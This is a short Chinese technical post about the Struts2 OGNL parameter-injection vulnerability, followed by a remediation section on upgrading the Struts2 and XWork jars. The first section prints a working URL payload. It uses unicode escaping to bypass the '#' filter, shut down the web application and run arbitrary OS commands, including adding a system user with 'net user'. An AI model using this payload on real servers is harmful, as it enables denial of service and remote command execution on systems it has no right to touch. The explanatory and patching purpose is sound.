1、原理
Struts2的核心是使用的webwork框架,處理 action時(shí)通過(guò)調(diào)用底層的getter/setter方法來(lái)處理http的參數(shù),它將每個(gè)http參數(shù)聲明為一個(gè)ONGL(這里是ONGL的介紹)語(yǔ)句。當(dāng)我們提交一個(gè)http參數(shù):
user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL將它轉(zhuǎn)換為:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
這是通過(guò)ParametersInterceptor(參數(shù)過(guò)濾器)來(lái)執(zhí)行的,使用用戶提供的HTTP參數(shù)調(diào)用 ValueStack.setValue()。 www.
為了防范篡改服務(wù)器端對(duì)象,XWork的ParametersInterceptor不允許參數(shù)名中出現(xiàn)“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻擊者就可以繞過(guò)保護(hù),修改保護(hù)Java方式執(zhí)行的值:
此處代碼有破壞性,請(qǐng)?jiān)跍y(cè)試環(huán)境執(zhí)行,嚴(yán)禁用此種方法進(jìn)行惡意攻擊
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
轉(zhuǎn)義后是這樣:
('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
OGNL處理時(shí)最終的結(jié)果就是
java.lang.Runtime.getRuntime().exit(1); //關(guān)閉程序,即將web程序關(guān)閉
類似的可以執(zhí)行
java.lang.Runtime.getRuntime().exec("net user 用戶名 密碼 /add");//增加操作系統(tǒng)用戶,在有權(quán)限的情況下能成功(在URL中用%20替換空格,%2F替換/)
只要有權(quán)限就可以執(zhí)行任何DOS命令。
2、解決方法
網(wǎng)上很多文章都介紹了三種解決方法,個(gè)人覺(jué)得將struts2的jar包更新到最新版本最簡(jiǎn)單,不用更改任何程序代碼,目前最新版本2.3.4
下載到的更新包中有很多jar包,我系統(tǒng)中主要用到以下幾個(gè)替換掉舊版本的:
commons-lang3-3.1.jar (保留commons-lang-2.6.jar)
javassist-3.11.0.GA.jar (新加包)
ognl-3.0.5.jar (替換舊版本)
struts2-core-2.3.4.1.jar (替換舊版本)
xwork-core-2.3.4.1.jar (替換舊版本)